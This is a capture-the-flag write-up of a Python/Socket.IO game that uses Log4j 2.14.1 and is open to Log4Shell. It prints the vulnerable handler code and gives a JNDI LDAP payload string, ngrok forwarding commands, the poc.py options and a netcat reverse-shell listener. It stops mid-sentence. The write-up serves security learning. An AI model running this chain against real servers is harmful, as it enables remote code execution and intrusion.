I am developing a game with websockets in python. I left my pc to a java fan, I think he really messed up. It is forbidden to perform or attempt to perform any action against the infrastructure or the challenge itself.
By entering the login credentials specified in the challenge description, we are redirected to this page:
Play
From here, every time I clicked on play, nothing happened; only the access number in the queue changed. For this reason, I decided to read the attached files, and the first thing that caught my eye was the log4j.properties file. From there, I realized it was using Log4j, so I went to check the installed version in the Dockerfile:
As we can see, the version is 2.14.1. Searching online, this version is vulnerable to CVE-2021-44228. Now we just need to figure out how to send the payload to exploit it. Continuing to read, I noticed in the anticheat.py file the use of spark and log4j, so I understood that the game’s anticheat system needed to be triggered in some way to exploit the vulnerability:
Continuing to read the files, I noticed that the browser and server also communicate via Socket.IO. However, if we examine the socket.py file, we see that there is no input validation. Even though our account is just a spectator, we can call any function. The handle_bird_movement function, although it uses the user ID, does not take it from cookies. It retrieves it from user-controlled input, so we can provide any ID we want, whether it belongs to a player or a spectator:
definit_socket_events(socketio,players):@socketio.on('connect')@login_requireddefhandle_connect():user_id=int(current_user.get_id())log_action(user_id,"is connecting")ifuser_idinplayers.keys():# Player already exists, send their current positionemit('connected',{'user_id':user_id,'x':players[user_id]['x'],'y':players[user_id]['y'],'angle':players[user_id]['angle']})else:# TODO: Check if the lobby is full and add the player to the queuelog_action(user_id,f"is spectating")emit('update_bird_positions',players,broadcast=True)@socketio.on('move_bird')@login_requireddefhandle_bird_movement(data):user_id=data.get('user_id')ifuser_idinplayers:deldata['user_id']ifplayers[user_id]!=data:withlock:players[user_id]={'x':data['x'],'y':data['y'],'color':'black','angle':data.get('angle',0)}ifanalyze_movement(user_id,data['x'],data['y'],data.get('angle',0)):log_action(user_id,f"was cheating with final position ({data['x']}, {data['y']}) and final angle: {data['angle']}")# del players[user_id] # Remove the player from the game - we are in beta so idcemit('update_bird_positions',players,broadcast=True)@socketio.on('disconnect')@login_requireddefhandle_disconnect(data):user_id=current_user.get_id()ifuser_idinplayers:delplayers[user_id]emit('update_bird_positions',players,broadcast=True)
To trigger the anticheat, we still need to bypass the analyze_movement function. This function calculates whether our speed exceeds a certain threshold (the speed is calculated using other data like coordinates and timestamps). If it detects suspicious movement, it will log the attempt (inserting our payload into the logs). It also interpolates the angle property, which is never used in analyze_movement, so we can set it to whatever we want. Let’s proceed with the exploit.
🔬 Vulnerability Analysis
Potential Vulnerabilities
Log4Shell
🎯 Solution Path
Exploitation Steps
Initial setup
The exploit essentially relies on sending a string like jndi:ldap://<ip>:1389/a to the server to have it written in the Log4j logs. Once this is done, we will receive a connection on our previously started server, obtaining a reverse shell.
Exploitation
First, I set up the port forwarding, as the poc.py file that exploits the vulnerability requires 3 port forwardings:
1
2
3
ngrok tcp 1389ngrok http 8080ngrok tcp 9001
The first port is where the LDAP server will be hosted, the second is for the web server where the string we send will retrieve the java exploit created by the poc.py file, and finally, the last port is used to receive the reverse shell on netcat. So, we also open a netcat session:
Once that is done, all that’s left is to send the string to the server to insert it into the logs. This can be done by writing a Python script with a socket connection to the server:
1
python exploit.py
Of course, in the exploit, every time it is run, the new ldap forwarding link created with ngrok must be set. This allowed me to obtain a reverse shell, and by running cat flag.txt, I was able to retrieve the flag.
🛠️ Exploitation Process
Approach
I used the following exploit. I installed openjdk-11-jdk (which is also used in the challenge), then in poc.py I replaced all the relative paths to the JDK with the names of the binaries, which are now in the PATH. I ran python3 poc.py --userip <ip> --webport 8080 --lport 9001, which starts the LDAP server on port 1389 and the HTTP server on port 8080. Then, in another terminal, I started a netcat listener on port 9001 (nc -lvnp 9001). I performed the port forwarding for the 3 ports and ran exploit.py. Another way to do this was directly via the DevTools, as we have direct access to the socket variable in DevTools. We can interact directly with the socket. To activate the anticheat, we can send two movements with a short interval, using very different coordinates:
